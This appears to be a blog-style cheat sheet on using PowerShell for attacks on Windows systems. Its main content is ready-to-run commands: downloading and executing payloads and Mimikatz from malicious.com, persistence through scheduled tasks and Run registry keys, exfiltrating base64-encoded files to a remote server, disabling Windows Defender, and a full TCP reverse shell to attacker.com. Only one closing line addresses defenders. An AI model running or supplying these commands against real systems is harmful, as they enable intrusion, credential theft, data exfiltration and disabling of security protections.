Leveraging PowerShell During Exploitation

Leveraging PowerShell during exploitation is a common technique used by attackers due to its powerful capabilities and its presence on most Windows systems. Here are several methods and techniques for using PowerShell during exploitation:

1. Initial Access and Reconnaissance

a. Download and Execute Malicious Scripts:
Attackers can use PowerShell to download and execute scripts from remote servers.

Invoke-WebRequest -Uri http://malicious.com/malware.ps1 -OutFile C:\Windows\Temp\malware.ps1
powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\malware.ps1

b. Gathering System Information:
PowerShell can be used to gather detailed information about the target system.

Get-Host
Get-Process
Get-Service
Get-WmiObject -Class Win32_ComputerSystem

2. Lateral Movement

a. Remote Command Execution:
PowerShell can be used to execute commands on remote systems if the attacker has valid credentials.

Invoke-Command -ComputerName RemotePC -ScriptBlock { Get-Process }

b. Using PsExec via PowerShell:
PsExec is a tool that allows for remote command execution, and it can be executed through PowerShell.

Start-Process -FilePath "PsExec.exe" -ArgumentList "\\RemotePC -u User -p Password cmd.exe"

3. Persistence

a. Creating Scheduled Tasks:
Attackers can use PowerShell to create scheduled tasks that execute malicious payloads.

$Action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument 'C:\Windows\Temp\malicious.ps1'
$Trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName 'UpdateTask' -User 'Administrator' -Password 'password'

b. Modifying Registry for Persistence:
PowerShell can be used to modify the Windows registry to achieve persistence.

Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' -Value 'C:\Windows\Temp\malicious.exe'

4. Credential Dumping

a. Using Mimikatz:
Attackers can use PowerShell to download and execute Mimikatz, a tool for extracting passwords.

Invoke-WebRequest -Uri http://malicious.com/mimikatz.exe -OutFile C:\Windows\Temp\mimikatz.exe
Start-Process -FilePath C:\Windows\Temp\mimikatz.exe

5. Data Exfiltration

a. Uploading Files to a Remote Server:
PowerShell can be used to upload files to an attacker’s server.

$FilePath = "C:\sensitive_data.txt"
$Server = "http://malicious.com/upload"
Invoke-RestMethod -Uri $Server -Method Post -InFile $FilePath -ContentType "multipart/form-data"

b. Encoding and Sending Data:
Attackers can encode sensitive data and send it to a remote server.

$Data = Get-Content "C:\sensitive_data.txt"
$EncodedData = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Data))
Invoke-RestMethod -Uri "http://malicious.com/receive" -Method Post -Body $EncodedData

6. Bypassing Security Mechanisms

a. Bypassing Execution Policy:
PowerShell scripts can be executed even if the execution policy is restricted.

powershell.exe -ExecutionPolicy Bypass -File malicious.ps1

b. Disabling Antivirus and Windows Defender:
Attackers can disable security features using PowerShell.

Set-MpPreference -DisableRealtimeMonitoring $true
Stop-Service -Name WinDefend

7. Creating Reverse Shells

a. PowerShell Reverse Shell:
Attackers can create a reverse shell to control the target system remotely.

$client = New-Object System.Net.Sockets.TCPClient('attacker.com', 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

---

By leveraging PowerShell, attackers can perform a wide range of malicious activities, from initial reconnaissance to data exfiltration. It’s crucial for defenders to monitor PowerShell activity and implement security controls to mitigate these threats.

Note: Blog based on publicly available information.